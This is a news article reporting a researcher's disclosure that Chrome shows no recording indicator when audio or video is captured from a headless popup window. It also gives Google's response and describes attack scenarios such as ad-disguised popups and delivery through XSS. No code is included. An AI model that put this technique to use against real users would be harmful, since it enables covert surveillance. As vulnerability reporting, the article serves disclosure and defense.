Ran Bar-Zik, a web developer at AOL, has discovered and reported a bug in Google Chrome that allows websites to record audio and video without showing a visual indicator.

The bug is not as bad as it sounds, as the malicious website still needs to get the user's permission to access audio and video components, but there are various ways in which this issue could be weaponized to record audio or video without the user's knowledge.

The bug's central element is a "red circle and dot" icon that Chrome usually shows when recording audio or video streams.

In a private conversation, Bar-Zik told Bleeping Computer he discovered the bug at work while dealing with a website that ran WebRTC code.

WebRTC is a protocol for streaming audio and video content over the Internet in real time. In order to stream audio or video content, a user must first grant a website permission to access his audio and video components.

When a website receives this permission, it can run JavaScript code that records audio or video content, before sending it over the Internet to the other participants of an WebRTC stream. This recording process is done via the JavaScript-based MediaRecorder API.

Attack code is launched via a Chrome popup

Bar-Zik discovered that the code that does the recording doesn't necessarily have to run on the original tab where the permission was granted.

Because the permission to access audio and video data was granted for an entire domain, the Israeli developer realized he could start a headless Chrome window (popup) where he could run the code to record audio and video.

Because Chrome shows the red circle and dot icon in a window's tab, the icon doesn't appear for the popup because this headless window doesn't have a tab bar.

Researcher reported issue to Google, but no urgent fix is coming

Bar-Zik told Bleeping Computer that after he had verified this issue with family members and other peers, he submitted a bug report to Google.

The bug report is available here. The report also includes a benign demo that asks the user for permission, launches a popup when a user clicks o button, records 20 seconds of audio, and provides a download link for the recorded file. The proof-of-concept code is also available for download from here.

In a response Bar-Zik received on the same day, Google declined to consider this bug a security issue.

This isn't really a security vulnerability - for example, WebRTC on a mobile device shows no indicator at all in the browser. The dot is a best-first effort that only works on desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.

Researchers sees issue used in stealthy surveillance

Bar-Zik doesn't agree with Google's assessment. For example, the researcher argues that many people are affected by UI fatigue and tend to click on many permissions without reading what they agreed to.

Once the user has carelessly or accidentally granted a website the permission to access audio and video components, more sophisticated attacks can be carried out.

"Real attacks will not be very obvious," says Bar-Zik, comparing real world attacks with his user click-driven demo.

For example, Bar-Zik argues that an attacker could use very small popups to launch the attack code. This code can use the camera for a millisecond to take a user's picture, or for hours, recording the user's movements or nearby audio. If the user doesn't notice the popup in his toolbar, there's no visual indicator to cue him that someone is accessing his audio and video components. One of the sneakiest scenarios would be if the attacker disguised the popup as a mundane ad. If the user doesn't immediately close the ad's popup, an attacker remains with an surveillance channel opened on the user's PC.

Bar-Zik also says that an attacker doesn't necessarily need a createa website that ask and gain these permissions. An attacker could exploit cross-site scripting (XSS) flaws on legitimate websites that have already obtained access to the user's audio and video components. These XSS flaws could be used to deliver the attack code.

Google isn't wrong in its assessment

Since this Google didn't label this as a security issue, Chrome will not receive an urgent fix.

Nonetheless, Google is also right in its decision to not consider this a security issue, as the red circle and dot icon is not present in all Chrome versions, and the real defense against this type of attack is the permissions popup.

Users that want to stay safe against these types of attacks should pay close attention to the permissions they grant websites.